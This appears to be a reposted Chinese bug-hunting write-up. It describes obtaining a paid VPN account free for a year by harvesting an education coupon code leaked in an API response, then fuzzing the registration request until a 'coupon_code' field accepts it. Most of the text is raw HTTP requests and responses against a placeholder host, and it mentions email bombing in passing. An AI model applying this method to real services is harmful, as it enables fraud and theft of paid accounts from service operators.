免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
漏洞挖掘
POST /Api/EduCoupons/SendMail HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: https://example.com/X-Requested-With: XMLHttpRequestContent-Type: application/jsonContent-Length: 37Cookie:Connection: close{"email":"[email protected]"}
这个POST请求没有什么特别的(当然你可以尝试邮件轰炸),但是当我看这个POST请求的响应时,有点可疑。
HTTP/1.1 200 OKDate: Wed, 18 Feb 2024 07:13:37 GMTContent-Type: application/jsonContent-Length: 28Connection: closeSet-Cookie:X-Content-Type-Options: nosniffEtag: "3147526947"{“code”: “cdea258cfa67”}响应包的内容"cdea258cfa67",该内容是页面提到的"向您发送一个链接,领取您的免费会员账户",发送了一个带有链接的邮件,但响应包却泄露了为.edu.cn注册而生成的一串代码。(这个代码,在借在校生走正常流程的时候,知道是优惠卷)。
下一个问题是如何使用代码或如何验证代码是否有效,没有包含添加优惠券代码的字段。
下一个问题是如何使用代码或如何验证代码是否有效,没有包含添加优惠券代码的字段。
第一次正常请求:
POST /Api/Register HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: https://example.com/X-Requested-With: XMLHttpRequestContent-Type: application/jsonContent-Length: 37Cookie:Connection: close{"tos":"true","name":"asdasd","email":"[email protected]","passwd":"aasdasdasdas","repasswd":"aasdasdasdas“,"emailcode":"123123","fingerprint":"44ce0eaf8d92f30c44a31d911651ed11"}响应内容是正常的。
第二次加入code字段请求测试:
POST /Api/Register HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: https://example.com/X-Requested-With: XMLHttpRequestContent-Type: application/jsonContent-Length: 37Cookie:Connection: close{"tos":"true","name":"asdasd","email":"[email protected]","passwd":"aasdasdasdas","repasswd":"aasdasdasdas","code":"cdea258cfa67","emailcode":"123123","fingerprint":"44ce0eaf8d92f30c44a31d911651ed11"}响应包却500错误了,猜测这处优惠卷字段不为code 通过fuzz优惠卷字段名最终得到字段为"coupon_code"。在POST请求并添加"coupon_code": "cdea258cfa67" 第三次加入coupon_code字段请求: POST /Api/Register HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: https://example.com/X-Requested-With: XMLHttpRequestContent-Type: application/jsonContent-Length: 37Cookie:Connection: close{"tos":"true","name":"asdasd","email":"[email protected]","passwd":"aasdasdasdas","repasswd":"aasdasdasdas","coupon_code":"cdea258cfa67","emailcode":"123123","fingerprint":"44ce0eaf8d92f30c44a31d911651ed11"}HTTP/1.1 200 OKDate: Wed, 18 Feb 2024 07:13:37 GMTContent-Type: application/jsonContent-Length: 28Connection: closeSet-Cookie:X-Content-Type-Options: nosniffEtag: "3147526947"{"user": {"id": 18127489,"email": "[email protected]"},“completed”: {“successful”: true,“duration”: “year”,“free”: true},“redirect_to_url”: “http://example.com/my/info”}最终获得1年。
设置公众号星标,关注+星标不迷路。
原文始发于微信公众号(漏洞文库):【漏洞挖掘】如何免费获得的300/年vpn的账户
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论